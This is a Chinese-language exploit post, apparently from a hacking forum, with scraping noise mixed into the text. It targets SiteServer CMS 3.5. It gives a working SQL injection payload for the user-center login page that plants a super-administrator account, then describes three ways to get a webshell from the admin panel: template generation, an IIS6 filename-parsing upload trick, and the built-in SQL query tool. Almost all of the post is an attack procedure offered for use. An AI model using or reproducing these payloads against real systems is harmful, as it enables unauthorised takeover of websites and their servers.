经测试秒杀最新的3.5版
/ y4 c. K+ ^" }) k7 K" Zstieserver官网:www.siteserver.cn
, O7 R G% G7 x% UEXP:
0 [! y1 h8 d+ j) J+ D+ C直接访问UserCenter/login.aspx- _9 g* _" p+ }) r
用户名处输入:7 |; @ [' A+ N! r( r+ d
u: v4 C6 Q' p3 Y4 H- n6 b' g! K
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–. r* I: w( W; U8 h% _
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
" ?* R5 O$ ?1 z/ [! o- |之后再访问后台SiteServer/login.aspx用插入的用户登陆
% _# |# }3 W! N% o7 ?后台拿webshell的三种方法:; O$ | j( P4 y! P% t5 C$ C
一、
" b1 j5 p0 u2 [2 S( C0 [站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
4 q8 W' f4 m+ K( z' i# O8 c$ U二、
* ]3 y+ V, s! ~/ S: Q, y5 l成员权限-》添加用户-》用户名为:1.asp
7 @" F4 W& ~8 fhttp://127.0.0.1/usercenter/
2 G% `4 T2 h% q% p8 b: v& W用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell7 d; V* p, z7 f& U7 K
(ps:后台添加用户时不会验证是否含有非法字符)
; w3 H; Y; i2 }7 A1 k# K三、
( c9 B6 G' ` i! @$ Z/ N! d系统工具-》实用工具-》机器参数查看
8 A5 Y& W7 f% q+ [可以看到数据库类型、名称,WEB路径, q/ C+ Z! h2 I( R0 y P
系统工具-》数据库工具-》SQL语句查询
2 [# W% A5 c3 m! X" h这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |